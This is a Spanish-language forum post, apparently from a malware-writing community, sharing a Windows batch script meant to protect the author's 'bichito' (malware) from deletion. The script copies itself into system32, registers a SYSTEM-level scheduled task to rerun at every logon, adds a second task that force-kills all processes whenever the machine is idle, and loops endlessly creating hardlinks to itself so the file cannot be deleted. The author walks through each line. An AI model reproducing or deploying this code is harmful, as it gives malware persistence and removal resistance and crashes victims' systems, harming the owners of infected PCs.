Bueno se me a ocurido otra manera de proteger nuestro bichito contra el borrado, haber que opinais vosotros al respecto, el code es el siguiente
@echo off
move /y %0 %systemroot%\system32\%0
schtasks /create /tn cll /tr call %systemroot%\system32\%0 /sc ONLOGON /ru "System"
schtasks /create /tn Kllbll /tr "taskkill /fi Estado eq /pid * /f /t" /sc ONIDLE /i 1 /ru "System"
goto bucle
:bucle
fsutil hardlink create %random%.bat %0.bat
goto bucle
Bueno en este code e creado una tarea programada que se iniciara tras un minuto de inactividad y ejecutara un taskkill a todos los procesos y subprocesos y otra tarea que ejecutara nuestro bat cada vez que se logee unusuario en el PC
schtasks /create /tn Kllbll /tr "taskkill /fi Estado eq /pid * /f /t" /sc ONIDLE /i 1 /ru "system"
schtasks /create /tn cll /tr call %systemroot%\system32\%0 /sc ONLOGON /ru "System"
Tambien seria correcto poner call %0 puesto que "/tr" si no se le pone ruta, por defecto toma la ruta "%systemroot%\system32"
Y el siguiente bucle generara un numero indefinido de vinculos fisicos, la propiedad que confieren a nuestro bat es que hasta que no elimine to2 los vinculos nu podra borrar el archivo
:bucle
fsutil hardlink create %random%.bat %0.bat
goto bucle
La cantidad de vinculos generados sera como maximo el limite de la variable %random%
Autor